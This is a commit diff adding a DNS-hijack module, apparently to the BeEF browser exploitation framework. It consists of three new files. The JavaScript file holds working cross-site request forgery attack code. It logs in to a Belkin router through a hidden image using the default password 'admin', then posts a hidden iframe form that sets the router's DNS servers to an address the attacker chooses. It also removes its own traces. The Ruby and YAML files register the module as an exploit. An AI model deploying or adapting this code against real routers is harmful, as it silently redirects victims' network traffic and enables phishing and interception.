Add belkin_dns_csrf DNS hijack module

Part of issue #538

modules/exploits/router/belkin_dns_csrf/command.js

@@ -0,0 +1,70 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	// config
+	var gateway = '<%= @base %>'; 
+	var path    = '/cgi-bin/setup_dns.exe';
+	var dns     = '<%= @dns %>';
+	var timeout = 15;
+
+	// validate DNS server IP address
+	var parts = dns.split('.');
+	if (parts.length != 4) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
+		return;
+	}
+	for (var i=0; i<parts.length; i++) {
+		var part = parts[i];
+		if (isNaN(part) || part < 0 || part > 255) {
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
+			return;
+		}
+	}
+	var dns_1 = parts[0];
+	var dns_2 = parts[1];
+	var dns_3 = parts[2];
+	var dns_4 = parts[3];
+
+	// attempt auth with default password (admin)
+	// incorrect login attempts do not log out an authenticated session
+	var img = new Image();
+	img.setAttribute("style", "visibility:hidden");
+	img.setAttribute("width", "0");
+	img.setAttribute("height","0");
+	img.id = 'belkin_auth_<%= @command_id %>';
+	img.src = gateway+"/cgi-bin/login.exe?pws=admin";
+	document.body.appendChild(img);
+
+	// change DNS
+	var belkin_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "POST", [
+		{'type':'hidden', 'name':'dns1_1',   'value':dns_1},
+		{'type':'hidden', 'name':'dns1_2',   'value':dns_2},
+		{'type':'hidden', 'name':'dns1_3',   'value':dns_3},
+		{'type':'hidden', 'name':'dns1_4',   'value':dns_4},
+		{'type':'hidden', 'name':'dns2_1',   'value':dns_1},
+		{'type':'hidden', 'name':'dns2_2',   'value':dns_2},
+		{'type':'hidden', 'name':'dns2_3',   'value':dns_3},
+		{'type':'hidden', 'name':'dns2_4',   'value':dns_4},
+		{'type':'hidden', 'name':'dns2_1_t', 'value':dns_1},
+		{'type':'hidden', 'name':'dns2_2_t', 'value':dns_2},
+		{'type':'hidden', 'name':'dns2_3_t', 'value':dns_3},
+		{'type':'hidden', 'name':'dns2_4_t', 'value':dns_4},
+		{'type':'hidden', 'name':'auto_from_isp', 'value':'0'}
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(belkin_iframe_<%= @command_id %>);
+		document.body.removeChild(belkin_auth_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+

modules/exploits/router/belkin_dns_csrf/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        belkin_dns_csrf:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Belkin DNS Hijack CSRF"
+            description: "Attempts to change the DNS setting on a Belkin router.<br/><br/>Multiple models are affected, including F5D7230 and F1PI242EG, however this module has not been tested."
+            authors: ["bcoles"]
+            target:
+                unknown: ["ALL"]

modules/exploits/router/belkin_dns_csrf/module.rb

@@ -0,0 +1,21 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# This module has not been tested
+###
+class Belkin_dns_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'},
+			{'name' => 'dns', 'ui_label' => 'DNS Server', 'value' => '8.8.8.8'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end